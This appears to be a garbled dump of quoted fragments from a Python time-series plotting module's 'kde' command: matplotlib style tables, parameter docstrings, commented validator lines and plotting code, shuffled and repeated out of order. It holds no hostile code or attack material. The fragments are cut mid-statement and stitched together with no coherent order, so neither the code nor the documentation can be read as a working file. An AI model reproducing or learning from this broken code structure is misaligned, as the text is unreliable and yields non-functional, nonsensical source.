+------+---------+", "The number of random subsets of 'bootstrap_size'. norm_xaxis DEPRECATED: use", "is False] Whether to plot grid lines on the major", "of the random subset for 'bootstrap' plot. bootstrap_samples [optional, defaults", "skiprows=None, index_type=\"datetime\", names=None, ofilename=\"plot.png\", xtitle=\"\", ytitle=\"\", title=\"\", figsize=\"10,6.0\", legend=None, legend_names=None,", "deprecated. * * For --logx use --xaxis=\"log\" * For --logy", "= None if c is not None: plt.setp(line, color=c) plt.setp(line,", "str [optional, defaults is ''] Will add a match line", "will be used as the linestyle for all vertical lines.", "as the linestyle code. Separated 'colors', 'linestyles', and 'markerstyles' instead", "vlines_colors=vlines_colors, vlines_linestyles=vlines_linestyles, ) # @tsutils.validator( # ofilename=[str, [\"pass\", []], 1],", "= nylim[1] if type in [ \"time\", \"xy\", \"bar\", \"bar_stacked\",", "color=c) plt.setp(line, marker=m) plt.setp(line, linestyle=l) ytitle = ytitle or \"Density\"", "True or norm_xaxis is True or norm_yaxis is True or", "[\"domain\", [True, False]], 1], # sharey=[bool, [\"domain\", [True, False]], 1],", "default is 'descending'] How to sort the values for the", "appropriate for black, white, and gray, however the \"ieee\" also", "to 'kde'] If plot type is 'scatter_matrix', this specifies the", "color names. +------------------+ | HTML Color Names | +==================+ |", "tri_down | +-------+----------------+ | 2 | tri_up | +-------+----------------+ |", "length as `hlines_y`. If a single number will be the", "names in the data set. You must supply a comma", "color for all horizontal lines. If a list must be", "\"seaborn-darkgrid\", # \"seaborn-deep\", # \"seaborn-muted\", # \"seaborn-notebook\", # \"seaborn-paper\", #", "number will be the maximum x value for all horizontal", "| +-------+----------------+ | 2 | tri_up | +-------+----------------+ | 3", "the horizontal lines. If a single linestyle then will be", "Code | Lines | +=========+==============+ | ``-`` | solid |", "gray. Matplotlib styles: https://matplotlib.org/3.3.1/gallery/style_sheets/style_sheets_reference.html SciencePlots styles: https://github.com/garrettj403/SciencePlots hlines_y: [optional, defaults", "None | draw nothing | +---------+--------------+ | ' ' |", "each horizontal line. If a list must be same length", "True: plt.gca().invert_yaxis() plt.grid(grid) plt.title(title) plt.tight_layout() if ofilename is not None:", "lognorm_yaxis, weibull_xaxis, and weibull_yaxis. {columns} {start_date} {end_date} {clean} {skiprows} {index_type}", "white, nd gray. Matplotlib styles: https://matplotlib.org/3.3.1/gallery/style_sheets/style_sheets_reference.html SciencePlots styles: https://github.com/garrettj403/SciencePlots hlines_y:", "where to place a horizontal line. hlines_xmin: [optional, defaults to", "| +---------+--------------+ | -- | dashed | +---------+--------------+ | -.", "| +-------+----------------+ | o | circle | +-------+----------------+ | v", "\"bmh\", # \"dark_background\", # \"fast\", # \"fivethirtyeight\", # \"ggplot\", #", "None] List of minimum x values to start the horizontal", "matplotlib hatch types. Otherwise on the command line a comma", "weibull_xaxis, and weibull_yaxis. {columns} {start_date} {end_date} {clean} {skiprows} {index_type} {names}", "| draw nothing | +---------+--------------+ Line reference: http://matplotlib.org/api/artist_api.html markerstyles [optional,", "if linestyles == \"auto\": linestyles = plotutils.LINE_LIST else: linestyles =", "c is not None: plt.setp(line, color=c) plt.setp(line, marker=m) plt.setp(line, linestyle=l)", "[optional, default is 'weibull'] {plotting_position_table} Only used for norm_xaxis, norm_yaxis,", "yaxis=yaxis, xlim=xlim, ylim=ylim, secondary_y=secondary_y, mark_right=mark_right, scatter_matrix_diagonal=scatter_matrix_diagonal, bootstrap_size=bootstrap_size, bootstrap_samples=bootstrap_samples, norm_xaxis=norm_xaxis, norm_yaxis=norm_yaxis,", "depends on ``type``] Title of x-axis. ytitle : str [optional,", "length as `hlines_y`. If None will take for the standard", "using the Python API. +-----------------+-------------------+ | bar_hatchstyles | Description |", "por=por, invert_xaxis=invert_xaxis, invert_yaxis=invert_yaxis, round_index=round_index, plotting_position=plotting_position, prob_plot_sort_values=prob_plot_sort_values, source_units=source_units, target_units=target_units, lag_plot_lag=lag_plot_lag, plot_styles=plot_styles,", "| g | green | +------+---------+ | r | red", "ofilename : str [optional, defaults to 'plot.png'] Output filename for", "norm_yaxis=False, lognorm_xaxis=False, lognorm_yaxis=False, xy_match_line=\"\", grid=False, label_rotation=None, label_skip=1, force_freq=None, drawstyle=\"default\", por=False,", "x value for the entire plot. hlines_colors: [optional, defaults to", "False]], 1], # label_rotation=[float, [\"pass\", []], 1], # label_skip=[int, [\"range\",", "hlines_colors=None, hlines_linestyles=\"-\", vlines_x=None, vlines_ymin=None, vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\", ): r\"\"\"Kernel density", "| ``\\`` | back diagonal | +-----------------+-------------------+ | ``|`` |", "code. Separated 'colors', 'linestyles', and 'markerstyles' instead of using the", "will take for the standard linestyles list. \"\"\" plt =", "y-axis. plotting_position : str [optional, default is 'weibull'] {plotting_position_table} Only", "the plot from 1 to 1000, where '--xlim ,1000' would", "to end each vertical line. If a list must be", "linestyle for all vertical lines. If a list must be", "imarkerstyles = itertools.cycle(markerstyles) ilinestyles = itertools.cycle(linestyles) # Only for bar,", "iterate through the available matplotlib hatch types. Otherwise on the", "hlines_xmax = nxlim[1] if vlines_x is not None: vlines_x =", "): r\"\"\"Kernel density estimation of probability density function. \"kde\" will", "\"bar\", \"bar_stacked\", \"histogram\", \"norm_xaxis\", \"lognorm_xaxis\", \"weibull_xaxis\", \"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\", ]:", "value for all vertical lines. A missing value or None", "the input data. The 'legend_names' option allows you to override", "bar plots. label_skip : int [optional] Skip for major labels", "# ylim=[float, [\"pass\", []], 2], # xaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]],", "more of Matplotlib styles \"classic\", \"Solarize_Light2\", \"bmh\", \"dark_background\", \"fast\", \"fivethirtyeight\",", "Comma separated matplotlib style strings per time-series. Just combine codes", "a PNG file. If used within Python, and `ofilename` is", "the horizontal line. If a list must be same length", "| . | point | +-------+----------------+ | o | circle", "data.\"\"\" # Need to work around some old option defaults", "the probability density function based on the data called kernel", "* For --norm_yaxis use --type=\"norm_yaxis\" * For --lognorm_xaxis use --type=\"lognorm_xaxis\"", "A missing value or None will end at the maximum", "# xy_match_line=[str, [\"pass\", []], 1], # grid=[bool, [\"domain\", [True, False]],", "None will take for the standard linestyles list. vlines_x: [optional,", "for each time-series in the data set. subplots [optional, defaults", "in the data set. subplots [optional, defaults to False] Make", "[optional, default is 'descending'] How to sort the values for", "\" \"] + plotutils.LINE_LIST], # None, # ], # )", "to have the same number of style strings as time-series", "is ''] Will add a match line where x ==", "minimum x values for all horizontal lines. A missing value", "names associated with the input data. The 'legend_names' option allows", "[\"pass\", []], None], # vlines_colors=[str, [\"pass\", []], None], # vlines_linestyles=[", "| d | thin diamond | +-------+----------------+ | _ |", "| +---------+--------------+ Line reference: http://matplotlib.org/api/artist_api.html markerstyles [optional, default to '", "used if type equal to \"bar\", \"barh\", \"bar_stacked\", and \"barh_stacked\"]", "blindness. Black, White, and Gray Styles The \"ieee\" style is", "None] List of colors for the horizontal lines. If a", "is None will return the Matplotlib figure that can then", "[\"pass\", []], 1], # title=[str, [\"pass\", []], 1], # figsize=[float,", "is another style useful for photo-copyable black, white, nd gray.", "horizontal lines. A missing value or None will start at", "# title=[str, [\"pass\", []], 1], # figsize=[float, [\"range\", [0, None]],", "None] Still available, but if None is replaced by 'colors',", "[optional, defaults to None] List of minimum x values to", "# str, # [ # \"domain\", # [ # \"classic\",", "= os.path.join( os.path.dirname(__file__), os.pardir, \"SciencePlots_styles\" ) plot_styles = [ os.path.join(style_loc,", "``*`` | star | +-------+----------------+ | h | hexagon1 |", "if invert_xaxis is True: plt.gca().invert_xaxis() if invert_yaxis is True: plt.gca().invert_yaxis()", "pallette in the current plot style. vlines_linestyles: [optional, defaults to", "point | +-------+----------------+ | o | circle | +-------+----------------+ |", "| +------+---------+ | c | cyan | +------+---------+ | m", "and \"retro\". If multiple styles then each over rides some", "or legend == \"True\" or legend is None) type =", "to None] List of linestyles for the horizontal lines. If", "Otherwise on the command line a comma separated list, or", "lines. A missing value or None will start at the", "lnames = plotutils.check(type, tsd, legend_names) # This is to help", "is replaced by 'colors', 'linestyles', and 'markerstyles' options. Currently the", "scatter_matrix_diagonal=scatter_matrix_diagonal, bootstrap_size=bootstrap_size, bootstrap_samples=bootstrap_samples, norm_xaxis=norm_xaxis, norm_yaxis=norm_yaxis, lognorm_xaxis=lognorm_xaxis, lognorm_yaxis=lognorm_yaxis, xy_match_line=xy_match_line, grid=grid, label_rotation=label_rotation,", "os.pardir, \"SciencePlots_styles\" ) plot_styles = [ os.path.join(style_loc, i + \".mplstyle\")", "markerstyles=markerstyles, bar_hatchstyles=bar_hatchstyles, style=style, logx=logx, logy=logy, xaxis=xaxis, yaxis=yaxis, xlim=xlim, ylim=ylim, secondary_y=secondary_y,", "# \"science\", # \"grid\", # \"ieee\", # \"scatter\", # \"notebook\",", "scatter_matrix_diagonal=\"kde\", bootstrap_size=50, bootstrap_samples=500, norm_xaxis=False, norm_yaxis=False, lognorm_xaxis=False, lognorm_yaxis=False, xy_match_line=\"\", grid=False, label_rotation=None,", "| +-------+----------------+ | None | nothing | +-------+----------------+ | '", "H | hexagon2 | +-------+----------------+ | ``+`` | plus |", "matplotlib style strings per time-series. Just combine codes in 'ColorMarkerLine'", "styles \"seaborn-colorblind\", \"tableau-colorblind10\", \"bright\", \"vibrant\", and \"muted\" are all styles", "plot. hlines_xmax: [optional, defaults to None] List of maximum x", "each time-series in the data set. subplots [optional, defaults to", "@tsutils.validator( # ofilename=[str, [\"pass\", []], 1], # type=[str, [\"domain\", [\"kde\",],],", "input_ts=\"-\", columns=None, start_date=None, end_date=None, clean=False, skiprows=None, index_type=\"datetime\", names=None, ofilename=\"plot.png\", xtitle=\"\",", "| s | square | +-------+----------------+ | p | pentagon", "of x values] Comma separated lower and upper limits for", "subplots=subplots, sharex=sharex, sharey=sharey, colors=colors, linestyles=linestyles, markerstyles=markerstyles, bar_hatchstyles=bar_hatchstyles, style=style, logx=logx, logy=logy,", "number of random subsets of 'bootstrap_size'. norm_xaxis DEPRECATED: use '--type=\"norm_xaxis\"'", "`xlim` for examples. xaxis : str [optional, default is 'arithmetic']", "[\"pass\", []], 1], # ytitle=[str, [\"pass\", []], 1], # title=[str,", "to \"auto\", only used if type equal to \"bar\", \"barh\",", "the x-axis of the plot. For example, '--xlim 1,1000' would", "ytitle=[str, [\"pass\", []], 1], # title=[str, [\"pass\", []], 1], #", "style [optional, default is None] Still available, but if None", "[optional] Skip for major labels for bar plots. drawstyle :", "# \"muted\", # \"retro\", # ], # ], # None,", "a list of strings if using the Python API. Separated", "| ``*`` | star | +-------+----------------+ | h | hexagon1", "FixedLocator tsd = tsutils.common_kwds( input_ts, skiprows=skiprows, names=names, index_type=index_type, start_date=start_date, end_date=end_date,", "| horizontal | +-----------------+-------------------+ | + | crossed | +-----------------+-------------------+", "\"auto\", only used if type equal to \"bar\", \"barh\", \"bar_stacked\",", "| +-------+----------------+ | H | hexagon2 | +-------+----------------+ | ``+``", "start the horizontal line. If a list must be same", "in the data set. You must supply a comma separated", "\"grayscale\" is another style useful for photo-copyable black, white, nd", "# hlines_xmax=[float, [\"pass\", []], None], # hlines_colors=[str, [\"pass\", []], None],", "``\\`` | back diagonal | +-----------------+-------------------+ | ``|`` | vertical", "# drawstyle=[str, [\"pass\", []], 1], # por=[bool, [\"domain\", [True, False]],", "based on range of x values] Comma separated lower and", "plt.grid(grid) plt.title(title) plt.tight_layout() if ofilename is not None: plt.savefig(ofilename) return", "None], # hlines_xmax=[float, [\"pass\", []], None], # hlines_colors=[str, [\"pass\", []],", "2], # xaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]], 1], # yaxis=[str, [\"domain\",", "[\"arithmetic\", \"log\"]], 1], # yaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]], 1], #", "style strings per time-series. Just combine codes in 'ColorMarkerLine' order,", "try: pltfreq = str(tsd.index.freq, \"utf-8\").lower() except TypeError: pltfreq = str(tsd.index.freq).lower()", "chosen style. At the command line supply a comma separated", "| +------+---------+ | r | red | +------+---------+ | c", "| +------+---------+ | g | green | +------+---------+ | r", "legend_names=[str, [\"pass\", []], 1], # subplots=[bool, [\"domain\", [True, False]], 1],", "y values] Comma separated lower and upper limits for the", "lines on the major ticks. label_rotation : int [optional] Rotation", ": str [optional, defaults to ''] Title of chart. figsize", "False]], 1], # legend_names=[str, [\"pass\", []], 1], # subplots=[bool, [\"domain\",", "--norm_xaxis, --norm_yaxis, --lognorm_xaxis, and * --lognorm_yaxis options are deprecated. *", "force_freq=None, drawstyle=\"default\", por=False, invert_xaxis=False, invert_yaxis=False, round_index=None, plotting_position=\"weibull\", prob_plot_sort_values=\"descending\", source_units=None, target_units=None,", "| dots | +-----------------+-------------------+ | * | stars | +-----------------+-------------------+", "'kde'] If plot type is 'scatter_matrix', this specifies the plot", "plot_styles = [ os.path.join(style_loc, i + \".mplstyle\") if os.path.exists(os.path.join(style_loc, i", "\"domain\", # [\"weibull\", \"benard\", \"tukey\", \"gumbel\", \"hazen\", \"cunnane\", \"california\"], #", "# plotting_position=[ # str, # [ # \"domain\", # [\"weibull\",", "Still available, but if None is replaced by 'colors', 'linestyles',", "| large circle | +-----------------+-------------------+ | . | dots |", "of # mando legend = bool(legend == \"\" or legend", "end each vertical line. If a list must be same", "None], # hlines_colors=[str, [\"pass\", []], None], # hlines_linestyles=[ # str,", "= tsutils.make_list(markerstyles) if markerstyles is None: markerstyles = \" \"", "\"barh_stacked\"] If 'auto' will iterate through the available matplotlib hatch", "Defines the type of the xaxis. One of 'arithmetic', 'log'.", "1], # secondary_y=[bool, [\"domain\", [True, False]], 1], # mark_right=[bool, [\"domain\",", "subplots=True, share y axis. colors [optional, default is 'auto'] The", "\") else: markerstyles.append(\" \") linestyles.append(st[1:]) if linestyles is None: linestyles", "' | draw nothing | +---------+--------------+ | '' | draw", "n=2) _, ax = plt.subplots(figsize=figsize) if type in [\"kde\", \"probability_density\"]:", "| +------+---------+ | k | black | +------+---------+ 3. Number", "to False] In case subplots=True, share y axis. colors [optional,", "ofilename=ofilename, xtitle=xtitle, ytitle=ytitle, title=title, figsize=figsize, legend=legend, legend_names=legend_names, subplots=subplots, sharex=sharex, sharey=sharey,", "= plotutils.check(type, tsd, legend_names) # This is to help pretty", "the command line a comma separated list, or a list", "(KDE). {ydata} Parameters ---------- {input_ts} ofilename : str [optional, defaults", "# \"ggplot\", # \"grayscale\", # \"seaborn\", # \"seaborn-bright\", # \"seaborn-colorblind\",", "then each over rides some or all of the characteristics", "[\"domain\", [True, False]], 1], # plotting_position=[ # str, # [", "ytitle=\"\", title=\"\", figsize=\"10,6.0\", legend=None, legend_names=None, subplots=False, sharex=True, sharey=False, colors=\"auto\", linestyles=\"auto\",", "| tri_right | +-------+----------------+ | 8 | octagon | +-------+----------------+", "o | circle | +-------+----------------+ | v | triangle down", "* The --logx, --logy, --norm_xaxis, --norm_yaxis, --lognorm_xaxis, and * --lognorm_yaxis", "not None: plt.setp(line, color=c) plt.setp(line, marker=m) plt.setp(line, linestyle=l) ytitle =", "to 1000. ylim [optional, default is based on range of", "styles that are setup to be able to be distinguished", "separate subplots for each time series. sharex [optional, default to", "None] List of x values where to place a vertical", "| cyan | +------+---------+ | m | magenta | +------+---------+", "\"\", \" \", \" \"] + plotutils.HATCH_LIST], None], # style=[str,", "to None] Number or list of y values where to", "which has {} style strings, but you have {} time-series.", "xaxis. One of 'arithmetic', 'log'. yaxis : str [optional, default", "# \"bright\", # \"vibrant\", # \"muted\", # \"retro\", # ],", "are setup to be able to be distinguished by someone", "| +-----------------+-------------------+ | + | crossed | +-----------------+-------------------+ | x", "vlines_ymax=vlines_ymax, vlines_colors=vlines_colors, vlines_linestyles=vlines_linestyles, ) # @tsutils.validator( # ofilename=[str, [\"pass\", []],", "[]], 2], # xaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]], 1], # yaxis=[str,", "source_units=None, target_units=None, lag_plot_lag=1, plot_styles=\"bright\", hlines_y=None, hlines_xmin=None, hlines_xmax=None, hlines_colors=None, hlines_linestyles=\"-\", vlines_x=None,", "== 1: markerstyles.append(\" \") linestyles.append(\"-\") continue if st[1] in plotutils.MARKER_LIST:", "How to sort the values for the probability plots. Only", "| None | draw nothing | +---------+--------------+ | ' '", "'colors', 'linestyles', and 'markerstyles' options. Currently the 'style' option will", "{end_date} {clean} {skiprows} {index_type} {names} {source_units} {target_units} {round_index} plot_styles: str", "x values for all horizontal lines. A missing value or", "vlines_ymin=None, vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\", **kwds, ): r\"\"\"Plot data.\"\"\" # Need", "+------+---------+ | m | magenta | +------+---------+ | y |", "the y-axis of the plot. See `xlim` for examples. xaxis", "a space (' ') as the linestyle code. Separated 'colors',", "\"Solarize_Light2\", \"bmh\", \"dark_background\", \"fast\", \"fivethirtyeight\", \"ggplot\", \"grayscale\", \"seaborn\", \"seaborn-bright\", \"seaborn-colorblind\",", "hlines_xmin: [optional, defaults to None] List of minimum x values", "vlines_colors: [optional, defaults to None] List of colors for the", "+=================+===================+ | / | diagonal hatching | +-----------------+-------------------+ | ``\\``", "strings per time-series. Just combine codes in 'ColorMarkerLine' order, for", "to 50] The size of the random subset for 'bootstrap'", "(2 day) short_freq = \"({})\".format(pltfreq[beginstr:-1]) except AttributeError: short_freq = \"\"", "+-------+----------------+ | o | circle | +-------+----------------+ | v |", "Matplotlib styles \"classic\", \"Solarize_Light2\", \"bmh\", \"dark_background\", \"fast\", \"fivethirtyeight\", \"ggplot\", \"grayscale\",", "use the time-series names associated with the input data. The", "tsutils.error_wrapper( \"\"\" You have to have the same number of", "| tri_down | +-------+----------------+ | 2 | tri_up | +-------+----------------+", "x values to start the horizontal line. If a list", "[\"norm_yaxis\", \"lognorm_yaxis\", \"weibull_yaxis\"]: hlines_y = ppf(tsutils.make_list(hlines_y)) plt.hlines( hlines_y, hlines_xmin, hlines_xmax,", "| +-----------------+-------------------+ | x | crossed diagonal | +-----------------+-------------------+ |", "dashed | +---------+--------------+ | -. | dash_dot | +---------+--------------+ |", "at the minimum x value for the entire plot. vlines_ymax:", "type is 'scatter_matrix', this specifies the plot along the diagonal.", "* --lognorm_yaxis options are deprecated. * * For --logx use", "# vlines_colors=[str, [\"pass\", []], None], # vlines_linestyles=[ # str, #", "weibull_yaxis. prob_plot_sort_values : str [optional, default is 'descending'] How to", "You supplied '{}' for style which has {} style strings,", "different ways. 1. Use 'CN' where N is a number", "color from the current style. 2. Single character code from", "sharex [optional, default to True] In case subplots=True, share x", "by someone with color blindness. Black, White, and Gray Styles", "red | +------+---------+ | c | cyan | +------+---------+ |", "(' ') as the linestyle code. Separated 'colors', 'linestyles', and", "the data set. subplots [optional, defaults to False] Make separate", "| + | crossed | +-----------------+-------------------+ | x | crossed", "\"science\", # \"grid\", # \"ieee\", # \"scatter\", # \"notebook\", #", "the manipulation of time series.\"\"\" from __future__ import absolute_import, division,", "pandas as pd from mando.rst_text_formatter import RSTHelpFormatter from tstoolbox import", "\"ieee\" also will change the chart size to fit in", "| +-----------------+-------------------+ | . | dots | +-----------------+-------------------+ | *", "plotutils.know_your_limits(ylim, axis=yaxis) plot_styles = tsutils.make_list(plot_styles) + [\"no-latex\"] style_loc = os.path.join(", "if type equal to \"bar\", \"barh\", \"bar_stacked\", and \"barh_stacked\"] If", "= tsutils.make_list(bar_hatchstyles) if markerstyles == \"auto\": markerstyles = plotutils.MARKER_LIST else:", "^ | triangle up | +-------+----------------+ | < | triangle", "nxlim[1] if vlines_x is not None: vlines_x = tsutils.make_list(vlines_x) vlines_ymin", "a comma separated list, or a list of strings if", "labels for bar plots. drawstyle : str [optional, default is", "Line reference: http://matplotlib.org/api/artist_api.html markerstyles [optional, default to ' '] The", "hlines_y=None, hlines_xmin=None, hlines_xmax=None, hlines_colors=None, hlines_linestyles=\"-\", vlines_x=None, vlines_ymin=None, vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\",", "[\"pass\", []], None], # hlines_xmax=[float, [\"pass\", []], None], # hlines_colors=[str,", "in markerstyles] if colors is not None: icolors = itertools.cycle(colors)", "warnings.filterwarnings(\"ignore\") @mando.command(\"kde\", formatter_class=RSTHelpFormatter, doctype=\"numpy\") @tsutils.doc(plotutils.ldocstrings) def kde_cli( input_ts=\"-\", columns=None, start_date=None,", "4 | tri_right | +-------+----------------+ | 8 | octagon |", "used as the minimum x values for all vertical lines.", "tsutils.make_list(hlines_xmax) hlines_colors = tsutils.make_list(hlines_colors) hlines_linestyles = tsutils.make_list(hlines_linestyles) nxlim = ax.get_xlim()", "the vertical lines. If a single color then will be", "default is None] Still available, but if None is replaced", "black | +------+---------+ 3. Number between 0 and 1 that", "| point | +-------+----------------+ | o | circle | +-------+----------------+", "| +-------+----------------+ | D | diamond | +-------+----------------+ | d", "[\"domain\", [True, False]], 1], # scatter_matrix_diagonal=[str, [\"domain\", [\"kde\", \"hist\"]], 1],", "+-------+----------------+ | 2 | tri_up | +-------+----------------+ | 3 |", "# mando legend = bool(legend == \"\" or legend ==", "xaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]], 1], # yaxis=[str, [\"domain\", [\"arithmetic\", \"log\"]],", "y values where to place a horizontal line. hlines_xmin: [optional,", "i for i in linestyles] markerstyles = [\" \" if", "chartreuse | +------------------+ | ...etc. | +------------------+ Color reference: http://matplotlib.org/api/colors_api.html", "\"] + plotutils.LINE_LIST], # None, # ], # ) def", "| +-----------------+-------------------+ | O | large circle | +-----------------+-------------------+ |", "plt.legend(loc=\"best\") if hlines_y is not None: hlines_y = tsutils.make_list(hlines_y) hlines_xmin", "\"grid\", # \"ieee\", # \"scatter\", # \"notebook\", # \"high-vis\", #", "# hlines_y=[float, [\"pass\", []], None], # hlines_xmin=[float, [\"pass\", []], None],", "is not None: vlines_x = tsutils.make_list(vlines_x) vlines_ymin = tsutils.make_list(vlines_ymin) vlines_ymax", "limit the plot from 1 to 1000, where '--xlim ,1000'", "\"descending\"]], 1], # plot_styles=[ # str, # [ # \"domain\",", "False] Make separate subplots for each time series. sharex [optional,", "False]], 1], # mark_right=[bool, [\"domain\", [True, False]], 1], # scatter_matrix_diagonal=[str,", "| 'steps-pre' | 'steps-mid' | 'steps-post'] por [optional] Plot from", "to display the legend. legend_names : str [optional, defaults to", "None], # linestyles=[str, [\"domain\", [\"auto\", None, \"\", \" \", \"", "If a single linestyle then will be used as the", "linestyles list. vlines_x: [optional, defaults to None] List of x", "marker. If 'auto' will iterate through the available matplotlib marker", "with lines. The steps variants produce step-plots. 'steps' is equivalent", "| square | +-------+----------------+ | p | pentagon | +-------+----------------+", "the legend label the axis of the various time-series automatically.", "1], # invert_xaxis=[bool, [\"domain\", [True, False]], 1], # invert_yaxis=[bool, [\"domain\",", "for index, line in enumerate(ax.lines): if icolors is not None:", "the type of the yaxis. One of 'arithmetic', 'log'. secondary_y", "lognorm_xaxis DEPRECATED: use '--type=\"lognorm_xaxis\"' instead. lognorm_yaxis DEPRECATED: use '--type=\"lognorm_yaxis\"' instead.", "legend_names=None, subplots=False, sharex=True, sharey=False, colors=\"auto\", linestyles=\"auto\", markerstyles=\" \", bar_hatchstyles=\"auto\", style=\"auto\",", "\"seaborn-ticks\", # \"seaborn-white\", # \"seaborn-whitegrid\", # \"tableau-colorblind10\", # \"science\", #", "To not display lines use a space (' ') as", "--logx, --logy, --norm_xaxis, --norm_yaxis, --lognorm_xaxis, and * --lognorm_yaxis options are", "+------+---------+ 3. Number between 0 and 1 that represents the", "where '--xlim ,1000' would base the lower limit on the", "If used within Python, and `ofilename` is None will return", "hlines_xmin=None, hlines_xmax=None, hlines_colors=None, hlines_linestyles=\"-\", vlines_x=None, vlines_ymin=None, vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\", ):", "tsutils from .. import plotutils warnings.filterwarnings(\"ignore\") @mando.command(\"kde\", formatter_class=RSTHelpFormatter, doctype=\"numpy\") @tsutils.doc(plotutils.ldocstrings)", "\"lognorm_yaxis\", \"weibull_yaxis\", ]: if hlines_y is not None: if type", "\" if style != \"auto\": nstyle = tsutils.make_list(style) if len(nstyle)", "# \"retro\", # ], # ], # None, # ],", "to True] In case subplots=True, share x axis. sharey [optional,", "estimation of the probability density function based on the data", "x value for the entire plot. hlines_xmax: [optional, defaults to", "hlines_linestyles=hlines_linestyles, vlines_x=vlines_x, vlines_ymin=vlines_ymin, vlines_ymax=vlines_ymax, vlines_colors=vlines_colors, vlines_linestyles=vlines_linestyles, ) # @tsutils.validator( #", "invert_yaxis is True: plt.gca().invert_yaxis() plt.grid(grid) plt.title(title) plt.tight_layout() if ofilename is", "'CN' where N is a number from 0 to 9", "# linestyles=[str, [\"domain\", [\"auto\", None, \"\", \" \", \" \"]", "os.path.join( os.path.dirname(__file__), os.pardir, \"SciencePlots_styles\" ) plot_styles = [ os.path.join(style_loc, i", "work around some old option defaults with the implementation of", "= itertools.cycle(linestyles) # Only for bar, barh, bar_stacked, and barh_stacked.", "you to override the names in the data set. You", "be same length as `vlines_x`. If a single number will", "ppf(tsutils.make_list(hlines_y)) plt.hlines( hlines_y, hlines_xmin, hlines_xmax, colors=hlines_colors, linestyles=hlines_linestyles, ) if vlines_x", "left | +-------+----------------+ | > | triangle right | +-------+----------------+", "If None will take from the color pallette in the", "vlines_ymax=[float, [\"pass\", []], None], # vlines_colors=[str, [\"pass\", []], None], #", "= tsutils.make_list(colors) if linestyles == \"auto\": linestyles = plotutils.LINE_LIST else:", "+------+---------+ | Code | Color | +======+=========+ | b |", "else: m = None if ilinestyles is not None: l", "using a secondary_y axis, should the legend label the axis", "# hlines_colors=[str, [\"pass\", []], None], # hlines_linestyles=[ # str, #", "| +---------+--------------+ | '' | draw nothing | +---------+--------------+ Line", "\"\" if colors == \"auto\": colors = None else: colors", "Single character code from the table below. +------+---------+ | Code", "1], # mark_right=[bool, [\"domain\", [True, False]], 1], # scatter_matrix_diagonal=[str, [\"domain\",", "is 'weibull'] {plotting_position_table} Only used for norm_xaxis, norm_yaxis, lognorm_xaxis, lognorm_yaxis,", "xy_match_line=xy_match_line, grid=grid, label_rotation=label_rotation, label_skip=label_skip, force_freq=force_freq, drawstyle=drawstyle, por=por, invert_xaxis=invert_xaxis, invert_yaxis=invert_yaxis, round_index=round_index,", "\"seaborn-muted\", \"seaborn-notebook\", \"seaborn-paper\", \"seaborn-pastel\", \"seaborn-poster\", \"seaborn-talk\", \"seaborn-ticks\", \"seaborn-white\", \"seaborn-whitegrid\", \"tableau-colorblind10\",", "yaxis : str [optional, default is 'arithmetic'] Defines the type", "--lognorm_yaxis use --type=\"lognorm_yaxis\" * \"\"\" ) if xaxis == \"log\":", "\"ieee\" style is appropriate for black, white, and gray, however", "secondary_y=secondary_y, figsize=figsize, ) for index, line in enumerate(ax.lines): if icolors", "---------- {input_ts} ofilename : str [optional, defaults to 'plot.png'] Output", "steps variants produce step-plots. 'steps' is equivalent to 'steps-pre' and", "use '--type=\"lognorm_yaxis\"' instead. xy_match_line : str [optional, defaults is '']", "# [\"domain\", [\"auto\", None, \"\", \" \", \" \"] +", "options. Currently the 'style' option will override the others. Comma", ": str [optional, defaults to None] Legend would normally use", "hlines_colors = tsutils.make_list(hlines_colors) hlines_linestyles = tsutils.make_list(hlines_linestyles) nxlim = ax.get_xlim() if", "x | crossed diagonal | +-----------------+-------------------+ | o | small", "hlines_colors=hlines_colors, hlines_linestyles=hlines_linestyles, vlines_x=vlines_x, vlines_ymin=vlines_ymin, vlines_ymax=vlines_ymax, vlines_colors=vlines_colors, vlines_linestyles=vlines_linestyles, ) # @tsutils.validator(", "and 1 that represents the level of gray, where 0", "try: linestyles.append(st[2:]) except IndexError: linestyles.append(\" \") else: markerstyles.append(\" \") linestyles.append(st[1:])", "time-series in the data set. subplots [optional, defaults to False]", "[\"kde\", \"probability_density\"]: ax = tsd.plot.kde( legend=legend, subplots=subplots, sharex=sharex, sharey=sharey, style=None,", "linestyles = plotutils.LINE_LIST else: linestyles = tsutils.make_list(linestyles) if bar_hatchstyles ==", "white an 1 is black. 4. Any of the HTML", "a single linestyle then will be used as the linestyle", "--lognorm_xaxis use --type=\"lognorm_xaxis\" * For --lognorm_yaxis use --type=\"lognorm_yaxis\" * \"\"\"", "bar_hatchstyles = plotutils.HATCH_LIST else: bar_hatchstyles = tsutils.make_list(bar_hatchstyles) if markerstyles ==", "a red dashed line with star marker. bar_hatchstyles [optional, default", "# None, # ], # hlines_y=[float, [\"pass\", []], None], #", "\"\"\"Collection of functions for the manipulation of time series.\"\"\" from", "color for all vertical lines. If a list must be", "1. Use 'CN' where N is a number from 0", "and weibull_yaxis. {columns} {start_date} {end_date} {clean} {skiprows} {index_type} {names} {source_units}", "norm_yaxis=norm_yaxis, lognorm_xaxis=lognorm_xaxis, lognorm_yaxis=lognorm_yaxis, xy_match_line=xy_match_line, grid=grid, label_rotation=label_rotation, label_skip=label_skip, force_freq=force_freq, drawstyle=drawstyle, por=por,", "hlines_colors=None, hlines_linestyles=\"-\", vlines_x=None, vlines_ymin=None, vlines_ymax=None, vlines_colors=None, vlines_linestyles=\"-\", **kwds, ): r\"\"\"Plot", "is True: plt.gca().invert_yaxis() plt.grid(grid) plt.title(title) plt.tight_layout() if ofilename is not", "@tsutils.doc(plotutils.ldocstrings) def kde_cli( input_ts=\"-\", columns=None, start_date=None, end_date=None, clean=False, skiprows=None, index_type=\"datetime\",", "1,1000' would limit the plot from 1 to 1000, where", "share x axis. sharey [optional, default to False] In case", "None, # ], # ) def kde( input_ts=\"-\", columns=None, start_date=None,", "to last good value. Strips NANs from beginning and end.", "Set the style of the plot. One or more of", "as `hlines_y`. If a single number will be the maximum", "bar_hatchstyles == 